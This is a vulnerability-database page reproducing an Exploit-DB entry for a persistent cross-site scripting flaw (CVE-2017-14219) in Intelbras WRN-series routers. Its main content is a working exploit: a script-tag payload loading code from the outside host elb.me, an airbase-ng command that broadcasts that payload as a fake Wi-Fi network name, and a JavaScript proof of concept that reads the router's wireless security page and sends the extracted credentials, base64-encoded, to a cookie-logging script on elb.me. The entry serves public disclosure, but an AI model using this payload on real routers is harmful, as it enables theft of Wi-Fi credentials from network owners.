Lucene search
+L

Roteador Wireless Intelbras WRN150 - Cross-Site Scripting

🗓️ 07 Sep 2017 00:00:00Reported by Elber TavaresType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 61 Views

Intelbras WRN150 Router XSS Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
zdt
Roteador Wireless Intelbras WRN150 - Cross-Site Scripting Vulnerability
8 Sep 201700:00
zdt
cnvd
Intelbras Wireless N 150Mbps router cross-site scripting vulnerability
8 Sep 201700:00
cnvd
cve
CVE-2017-14219
7 Sep 201722:00
cve
cvelist
CVE-2017-14219
7 Sep 201722:00
cvelist
euvd
EUVD-2017-5729
7 Oct 202500:30
euvd
exploitpack
Roteador Wireless Intelbras WRN150 - Cross-Site Scripting
7 Sep 201700:00
exploitpack
nvd
CVE-2017-14219
7 Sep 201722:29
nvd
packetstorm
Roteador Wirelsss Intelbras WRN150 Cross Site Scripting
8 Sep 201700:00
packetstorm
prion
Command injection
7 Sep 201722:29
prion
ptsecurity
PT-2017-13302 · Intelbras · Intelbras Wireless N 150Mbps Router
7 Sep 201700:00
ptsecurity
Rows per page
# Exploit Title: XSS persistent on intelbras router with firmware WRN 250
# Date: 07/09/2017
# Exploit Author: Elber Tavares
# Vendor Homepage: http://intelbras.com.br/
# Version: Intelbras Wireless N 150Mbps - WRN 240
# Tested on: kali linux, windows 7, 8.1, 10

# CVE-2017-14219

For more info:


http://whiteboyz.xyz/xss-roteador-intelbras-wrn-240html

URL VULN: http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm

Payload: </script><script src='//elb.me'>

"elb.me contains the malicious code on index"

airbase-ng -e "</script><script src='//elb.me'>" -c 8 -v wlan0mon

//requires an php script to get the logs

PoC:

var rawFile = new XMLHttpRequest();
rawFile.onreadystatechange = function() {
       alert(rawFile.responseText);
       var base64 = rawFile.responseText.split('>')[1].split("/SCRIPT")[0];
       //seleiciona a parte da página com as credenciais
       new Image().src="https://elb.me/cookie.php?ck="+btoa(base64);
       //envia as credenciais encodadas em base64
};
rawFile.open("GET", "http://10.0.0.1/userRpm/WlanSecurityRpm.htm", true);
//pega a source da página /popupSiteSurveyRpm.htm
rawFile.send();

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Sep 2017 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 36.1
EPSS0.01438
61